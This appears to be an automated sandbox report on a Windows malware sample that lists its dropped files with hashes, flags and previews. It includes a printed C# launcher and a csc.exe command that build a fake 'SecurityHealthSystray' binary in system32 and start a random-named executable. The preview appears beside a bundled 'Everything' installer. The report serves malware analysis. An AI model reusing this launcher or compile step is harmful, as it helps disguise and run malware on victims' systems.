                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):400
                                                                                                          Entropy (8bit):5.096777061681283
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLROQboiFkD:JNVQIbSfhV7TiFkMSfhBFkD
                                                                                                          MD5:7AEFB25CFAB1081A0DFAE7C919DA8CEA
                                                                                                          SHA1:75423FCF7E8FBE7F929FDE26A15E6F1F9F8FB4BD
                                                                                                          SHA-256:4E68BF73EDC1174758E727CEB1D952174E950156161E6665E0BBCF92C234AE83
                                                                                                          SHA-512:EE2CC8DECD8113A2F838CC4CCE6BD7272B2F3D3E14C6E63FE8A0E613F042DCA7065949268BBE0BDB3AEB5DBDAA0074C5C9977A2FEDFD756FD4205AEC7068CB9B
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe"); } catch { } }).Start();. }.}.
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):251
                                                                                                          Entropy (8bit):5.080371799236936
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8o923flAhwn:Hu7L//TRq79cQy9ewn
                                                                                                          MD5:DA66D9EE6156A99785EB8B8CC6A667B0
                                                                                                          SHA1:80A6BDCF25CD22CC23D5A0D923FC77AE95046D2E
                                                                                                          SHA-256:7BC2E914658138591FD1A0B22015F4ABC2B9B97A90DE25254E7B1244F6E02D9D
                                                                                                          SHA-512:4822DDBC818B20B68129FAA8ADE3BA8AFB03AFD1EA4F565A7C6FD95A4ECFDCDC1B7112643111BC4E12D80549B4896698ED10ED8855BDEF708B1DB746093661FF
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\dcil424w\dcil424w.0.cs"
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (369), with CRLF, CR line terminators
                                                                                                          Category:modified
                                                                                                          Size (bytes):790
                                                                                                          Entropy (8bit):5.2362593926705125
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:Kj2I/un/Vq79tyHuKax5DqBVKVrdFAMBJTH:pN/Vq2OK2DcVKdBJj
                                                                                                          MD5:F3E9BB5607D85B295052D4549EA5F576
                                                                                                          SHA1:B30377178196A332EE10A743CC4FA328E7263D98
                                                                                                          SHA-256:DBD7F481066CFCF1EBDA03BB0DC767C2F46A80EB9DD43F756B1F8C76F9A75A9D
                                                                                                          SHA-512:B02ABBB0DC377126ABC18772FCA8705F2697A042FB75CB368253EE27E2C8BE5406A5FC24C6060213DC4E5C9233367346F4968926EC7A8658DA400DF8ECF39C33
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:.C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\dcil424w\dcil424w.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                          Process:C:\Users\user\Desktop\wxl1r0lntg.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1885848
                                                                                                          Entropy (8bit):7.972005632645183
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:W45XjhjuyXlt4+3oNBGsCornEsYwmve86irCrHEOP:W45XtjLVt4tJ/pmNHerv
                                                                                                          MD5:5036E609163E98F3AC06D5E82B677DF8
                                                                                                          SHA1:176DB10A4CDA7104F24EECE2D87E1A664B7FB929
                                                                                                          SHA-256:B2AFE799584C913532C673F99ADE45113BF5A5B605A964CE9FA837F563B6FC21
                                                                                                          SHA-512:40C4332E2E4132FC7F3A5F0738A67E7725B329C4A4B0643FBC65F5D1DE3CA4B6BF7374C2A722EA05F01A5E2DDD458344289FDB39BBB092A0B64E63EB168313E4
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*......@6............@.................................'Q....@..............................................................(...........................................................................................text...vf.......h.................. ..`.rdata...............l..............@..@.data...x...........................@....ndata... ...............................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):106496
                                                                                                          Entropy (8bit):1.136413900497188
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                          Category:dropped
                                                                                                          Size (bytes):196608
                                                                                                          Entropy (8bit):1.121297215059106
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\drivEn760.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3758248
                                                                                                          Entropy (8bit):7.0206169561348055
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:VmASxQdoNDZW77g1h0lv3o4MyTW+sWxXigRRlmrew1ycDMrf1seuhoeMQVuDvlTe:YpxQf75A4P9Fop4DEoeMRh3i
                                                                                                          MD5:25813C707BB52A7D7B880E7BA6AC78E1
                                                                                                          SHA1:720B2E002F225D15193B094DC47186577817D6DD
                                                                                                          SHA-256:42A5A708AF282C7D2DFCE4498448D191FEE8FF0487EF11F5754769D3CDCF1A2A
                                                                                                          SHA-512:B02EF7D0B347CE3818029FE88047943D349FD8246AE50696684229F21E40AFCC3F01C3C6501E918991884F43836A3F379300E101B89A1F21F42FEF8246B3AFDA
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:.h......,......................., .......9..&...bh......................................................>...................................................................................................................................................................................G...J...........r...f.......................U.......................................g.......................U.......................................................................................................................................................................j.......................U...............................................................................................................(...............U.......................................J...........\...5.......................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\drivEn760.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):19402
                                                                                                          Entropy (8bit):4.6448111269020655
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:Z2dVpOQCtRjkp+cF1W2WLg4xGJ4UytZpjMUFQQ5NverB35+:WVpO5FkocF5V48J4UytZpj1FPBkB35+
                                                                                                          MD5:1EBB92AC516DB5077A0C851565B7A2CF
                                                                                                          SHA1:9ADABFBB11B070169429FD43A250285EE8881213
                                                                                                          SHA-256:E64B60048B375F0C7D4C1FB4329957A297F2E60C306EF9C380175EA7A42223D6
                                                                                                          SHA-512:3FBA14D13A602937B8600C7D5CC8011F7369857BE288510B142573E411B2296CDB3CE58BEAFDF268D04AA1C5130503A63BA38F87239FC7B0BE2E0170BDFC86DE
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:Wednesday, 10 May 2023: Version 1.4.1.1023...fixed a security issue with the HTTP server....fixed an issue with empty EFU items.....Monday, 10 October 2022: Version 1.4.1.1022...fixed a crash when loading a preview failed.....Monday, 3 October 2022: Version 1.4.1.1021...fixed a security issue with using an insecure http connection to check for updates....fixed an issue with preventing devices from being safely removed.....Thursday, 8 September 2022: Version 1.4.1.1020...updated localization....fixed a security issue with using an insecure http connection to open the download page.....Wednesday, 17 August 2022: Version 1.4.1.1018...fixed an issue with the MSI installer and removing previous versions.....Friday, 20 May 2022: Version 1.4.1.1017...updated localization....fixed an issue with incrementing search history count when opening a bookmark.....Friday, 17 December 2021: Version 1.4.1.1015...fixed an encoding issue with translations.....Thursday, 16 December 2021: Version 1.4.1.1014.
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\drivEn760.exe
                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2265096
                                                                                                          Entropy (8bit):6.5533817908737655
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:GQdoNDZW77g1h0lv3o4MyTW+sWxXigRRlmrK:GQf75A4P9Fo+
                                                                                                          MD5:0170601E27117E9639851A969240B959
                                                                                                          SHA1:7A4AEE1910B84C6715C465277229740DFC73FA39
                                                                                                          SHA-256:35CEFE4BC4A98AD73DDA4444C700AAC9F749EFDE8F9DE6A643A57A5B605BD4E7
                                                                                                          SHA-512:3C24FA02621B78C5DDAF1AD9523045E9FA7CCC02D85A0342E8FAAFC31BE2A3154558D3CEFCD9AE8721973FB01450AB36E6BB75A1B95FCC485A4B919F20A2202F
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E.u.$.&.$.&.$.&..&.$.&..&.$.&...&.$.&...&.$.&.$.&.%.&..&u$.&..&.$.&..&.$.&Rich.$.&................PE..d...u.od.........."..........x................@..............................".....I."...@...........................................................!......!.D....h"..(...."......................................................................................text...>........................... ..`.rdata..............................@..@.data...(6..........................@....pdata..D.....!....... .............@..@.rsrc........!.......!.............@..@.reloc...1...."..2...6".............@..B........................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\drivEn760.exe
                                                                                                          File Type:QuArk archive data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):934469
                                                                                                          Entropy (8bit):7.985150006883096
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:9Uj10cDM1+8NnWk1Gmdo3eZWDmehoenMUjV7KDvl0CJ2G:YycDMrf1seuhoeMQVuDvlTJL
                                                                                                          MD5:BA118BDF7118802BEEA188727B155D5F
                                                                                                          SHA1:20FE923EC91D13F03BDB171DF2FE54772F86EBBA
                                                                                                          SHA-256:270C2DBD55642543479C7E7E62F99EC11BBC65496010B1354A2BE9482269D471
                                                                                                          SHA-512:01D8DD2BF9AA251512B6B9B47E9D966B7EDA5F76302E6441C5E7110FF37B4BE325A4F8096DF26A140C67BD740DCD720BC4E9356CCB95703AD63FE9FDBBB0C41F
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:7.......BZh91AY&SY.eg...........~..?{.....t.........Y....X.@..scu....H......P..h4. ........4...h.....@..m ....#FF!...4.......A.M..........4.......jm&M&.&....i.. ..L.LO$..0... .&!.#..4.2d.&L...0..h... ).mF.F.4..P.=@i..4..=A...............44.=A...@f4.!.'.6..!.Ex.Q.....J..B....).*.!.<.T.rd.....u..HlI2.1.....@d.d,..2..R...(.....n1.._x....... ...#E.Y..>.o,..~F....^.D.dk. ......H...$...$....]...F.....4....Bi*Cr... ._i...<.NQ....*].L.#.;...;E...;...LE....Y........5.K.r.... ,..|.J0.....6....#.DfBV....j...#..@}.....Ze]..!.xQ.T....B........i..6M...M.Eq"5.w.h.n..8...+.{.....e`.....;.p5..=j]o.`.|IC....QXUp......}....1..T.>A)......F...Y8..d$....R*.-m.?..$DL.P..0..r.....#...#.y..E..F.g&B.3.Xn......h.[%l.n.. C)j.../`T..,..6........N.4QS.5a...Q...r.g..+.......8..B..tSWbSc.S!.*......pD..j..80.....(.-....%.$a>..A....?9).jJ.lt.....B.>1..].n...pS...{.f.....p.R.#..H.:.cE.....@a..6!.*.jz)...O..!..*..$.d....n..A..6.Pdi.>...&<WT..$.i..LI...Tk..'.fp.02A....c.A.'{..`5LY..EN
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\drivEn760.exe
                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (754), with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2611
                                                                                                          Entropy (8bit):5.156615896081089
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:d6b8JplPvEDTQHcs5ITc3omFpNOOrYJwrYJzSEpPD0432sBp32s3Etm13t6THy:dPsvQHnodOrYJwrYJzSEhn3b3z9ITS
                                                                                                          MD5:2D8C6B891BEA32E7FA64B381CF3064C2
                                                                                                          SHA1:495396D86C96FB1CFDF56CAE7658149138056AA9
                                                                                                          SHA-256:2E017A9C091CF5293E978E796C81025DAB6973AF96CB8ACD56A04EF29703550B
                                                                                                          SHA-512:03A520F4423DA5EF158FB81C32CFFF0DEF361CC4D2CAA9CFA4D306136DA047A80A6931249A6B9C42F9F2656A27391B7921A64E10BAA7468C255BC48BD488A860
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:...Everything....Copyright (c) 2023 voidtools....Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:....The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.....THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\drivEn760.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                          Category:dropped
                                                                                                          Size (bytes):140122
                                                                                                          Entropy (8bit):6.897821587158416
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:lfY/TU9fE9PEtuSWKBAkae31mgjrzElPZdzEB3PlhsEP4f0nlJaosDF:pYa6IZCpe31mgjr4FZuNlhs0lJvsp
                                                                                                          MD5:9619F283A8809F06D9F25818DF792798
                                                                                                          SHA1:C959694843937043B09DA5189D50553AA6C24A6E
                                                                                                          SHA-256:F5E05A0AFC32604D961F2C1B8E500D33018718C3A1D47CBC3F4A98FE0D0E9CA8
                                                                                                          SHA-512:CD84EB50FC8AD582E5B60F1FED3174564EF356673F6DBC71E14A8F07BAA7EFA28EC434AAA9594460364A15C006FA4C56CE27D58D687DCC765FE07D5CAAA3B73E
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*......@6............@.................................'Q....@..............................................................(...........................................................................................text...vf.......h.................. ..`.rdata...............l..............@..@.data...x...........................@....ndata... ...............................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\drivEn760.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15872
                                                                                                          Entropy (8bit):5.471852540236525
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:EXsC43tPegZ3eBaRwCPOYY7nNYXC06/Yosa:EXJTgZ3eBTCmrnNA5p
                                                                                                          MD5:ECE25721125D55AA26CDFE019C871476
                                                                                                          SHA1:B87685AE482553823BF95E73E790DE48DC0C11BA
                                                                                                          SHA-256:C7FEF6457989D97FECC0616A69947927DA9D8C493F7905DC8475C748F044F3CF
                                                                                                          SHA-512:4E384735D03C943F5EB3396BB3A9CB42C9D8A5479FE2871DE5B8BC18DB4BBD6E2C5F8FD71B6840512A7249E12A1C63E0E760417E4BAA3DC30F51375588410480
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N.px.q.+.q.+.q.+.q.+[q.+.~C+.q.+^R.+.q.+^R/+.q.+.w.+.q.+.Q.+.q.+Rich.q.+........PE..L....Oa...........!.........`.......+.......0............................................@..........................8......X1..................................X....................................................0..X............................text............................... ..`.rdata..G....0......."..............@..@.data...DL...@.......,..............@....rsrc................6..............@..@.reloc..x............8..............@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\drivEn760.exe
                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1710
                                                                                                          Entropy (8bit):3.5521822919734736
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:rsX3R0m9w6IwK4tiUHLQwKs/jw/wLhSw3MaM:rsnuCo4tBgsGMTM
                                                                                                          MD5:334258A9E7352CE7485B6A2EED5E63C8
                                                                                                          SHA1:3B105724E7E555346F467EB801D5914457C4A191
                                                                                                          SHA-256:3E350FE24EB90E8012239AA594882F53C31B5CD1D33DE2CFBC1582C1D4CD28D2
                                                                                                          SHA-512:03F7BFFD04595A47D0C98BDDA3A24C85754298AD66BD7DC899B2B298A4916A5FF9FD590ED69955D20729C2BC6E035183BED8C4546F08FA348C3EC8A5046C05A1
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:..[.S.e.t.t.i.n.g.s.].....N.u.m.F.i.e.l.d.s.=.9.....R.T.L.=.0.....S.t.a.t.e.=.0.........[.F.i.e.l.d. .1.].....T.y.p.e.=.G.r.o.u.p.B.o.x.....T.e.x.t.=.S.e.t.t.i.n.g.s. .a.n.d. .d.a.t.a. .l.o.c.a.t.i.o.n.....L.e.f.t.=.0.....R.i.g.h.t.=.-.1.....T.o.p.=.0.....B.o.t.t.o.m.=.3.9.....H.W.N.D.=.6.6.6.6.8.........[.F.i.e.l.d. .2.].....F.l.a.g.s.=.G.R.O.U.P.....T.y.p.e.=.R.a.d.i.o.B.u.t.t.o.n.....T.e.x.t.=.%.A.P.P.D.A.T.A.%.\.E.v.e.r.y.t.h.i.n.g.....S.t.a.t.e.=.1.....L.e.f.t.=.6.....R.i.g.h.t.=.-.6.....T.o.p.=.1.0.....B.o.t.t.o.m.=.2.3.....H.W.N.D.=.6.6.6.7.0.........[.F.i.e.l.d. .3.].....T.y.p.e.=.R.a.d.i.o.B.u.t.t.o.n.....T.e.x.t.=.I.n.s.t.a.l.l.a.t.i.o.n. .f.o.l.d.e.r.....S.t.a.t.e.=.0.....L.e.f.t.=.6.....R.i.g.h.t.=.-.6.....T.o.p.=.2.3.....B.o.t.t.o.m.=.3.6.....H.W.N.D.=.6.6.6.7.2.........[.F.i.e.l.d. .4.].....T.y.p.e.=.G.r.o.u.p.B.o.x.....T.e.x.t.=.N.T.F.S. .i.n.d.e.x.i.n.g.....L.e.f.t.=.0.....R.i.g.h.t.=.-.1.....T.o.p.=.4.5.....B.o.t.t.o.m.=.9.7.....H.W.N.D.=.6.6.6.7.4.........[.F.i.e.l.d.
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\drivEn760.exe
                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2302
                                                                                                          Entropy (8bit):3.573371540654093
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:rsX3fjwMXw+DUMUXndyban558enEtF/XnqqGNtUdbPE+ybTfv:rsnfjwMA+IM2ndFn5Jn2nyeb/yXv
                                                                                                          MD5:31121595403CC5CFAC2162E7AD290C7F
                                                                                                          SHA1:C65AB9AD67380D02D62B1FFCC1ED9B034AD7D516
                                                                                                          SHA-256:8718A428F9B32EDF9AEC9756F97962EE3C2F398BA2824CB6AEF924406DF5289A
                                                                                                          SHA-512:B934C70E26A9C9F15F476BE7C22AA35616534202CE0EB2825348BD6BF561CB15B9B967CD44A2032681590C4942A1D1E4238BED07765C1D05DF5C16B2883D9F7F
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:..[.S.e.t.t.i.n.g.s.].....N.u.m.F.i.e.l.d.s.=.9.....R.T.L.=.0.....S.t.a.t.e.=.0.........[.F.i.e.l.d. .1.].....T.y.p.e.=.C.h.e.c.k.B.o.x.....T.e.x.t.=.C.h.e.c.k. .f.o.r. .u.p.d.a.t.e.s. .o.n. .s.t.a.r.t.u.p.....S.t.a.t.e.=.0.....L.e.f.t.=.0.....R.i.g.h.t.=.-.1.....T.o.p.=.0.....B.o.t.t.o.m.=.1.3.....H.W.N.D.=.1.3.2.2.1.6.........[.F.i.e.l.d. .2.].....T.y.p.e.=.C.h.e.c.k.B.o.x.....T.e.x.t.=.S.t.a.r.t. .E.v.e.r.y.t.h.i.n.g. .o.n. .s.y.s.t.e.m. .s.t.a.r.t.u.p.....S.t.a.t.e.=.1.....L.e.f.t.=.0.....R.i.g.h.t.=.-.1.....T.o.p.=.1.3.....B.o.t.t.o.m.=.2.6.....H.W.N.D.=.1.3.2.2.1.4.........[.F.i.e.l.d. .3.].....T.y.p.e.=.C.h.e.c.k.B.o.x.....T.e.x.t.=.I.n.s.t.a.l.l. .f.o.l.d.e.r. .c.o.n.t.e.x.t. .m.e.n.u.s.....S.t.a.t.e.=.0.....L.e.f.t.=.0.....R.i.g.h.t.=.-.1.....T.o.p.=.2.6.....B.o.t.t.o.m.=.3.9.....H.W.N.D.=.1.3.2.2.1.2.........[.F.i.e.l.d. .4.].....T.y.p.e.=.C.h.e.c.k.B.o.x.....T.e.x.t.=.I.n.s.t.a.l.l. .S.t.a.r.t. .m.e.n.u. .s.h.o.r.t.c.u.t.s.....S.t.a.t.e.=.1.....L.e.f.t.=.0.....R.i.g.h.t.=.-.
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\drivEn760.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5632
                                                                                                          Entropy (8bit):3.81812520226775
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:S46+/nTKYKxbWsptIpBtWZ0iV8jAWiAJCvxft2O2B8mFofjLl:zFuPbOBtWZBV8jAWiAJCdv2Cm0L
                                                                                                          MD5:68B287F4067BA013E34A1339AFDB1EA8
                                                                                                          SHA1:45AD585B3CC8E5A6AF7B68F5D8269C97992130B3
                                                                                                          SHA-256:18E8B40BA22C7A1687BD16E8D585380BC2773FFF5002D7D67E9485FCC0C51026
                                                                                                          SHA-512:06C38BBB07FB55256F3CDC24E77B3C8F3214F25BFD140B521A39D167113BF307A7E8D24E445D510BC5E4E41D33C9173BB14E3F2A38BC29A0E3D08C1F0DCA4BDB
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L....Oa...........!........."......?........ ...............................p............@.........................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\drivEn760.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12288
                                                                                                          Entropy (8bit):5.814115788739565
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                                                                          MD5:CFF85C549D536F651D4FB8387F1976F2
                                                                                                          SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                                                                          SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                                                                          SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\drivEn760.exe
                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1258
                                                                                                          Entropy (8bit):3.69551072954229
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:Q+sxvtSSAD5ylSYqWCs7y6PaL9ncCx86k8l9M4xCk6tbYpOXaH65OtC+nMc:rsx9AQSYqQtaR08lLqZXaNd
                                                                                                          MD5:4A47B8E8779134DC57853268646A3C95
                                                                                                          SHA1:3A2414DCBA162E742D58847059F3A0DC05A08944
                                                                                                          SHA-256:4B69E0C88DD888A3AC76A79DEF085DEF9F8581C0B9C15704A7F59795E066611D
                                                                                                          SHA-512:A60FC0E95B96216A4B4B5C303D4EE892C10130E4B61D74E1CC21BB7417D133D3CDAAD116F5361088760B6B6CFC10ABF082B8AE6F195F6C474E8A7E02C37E5C63
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
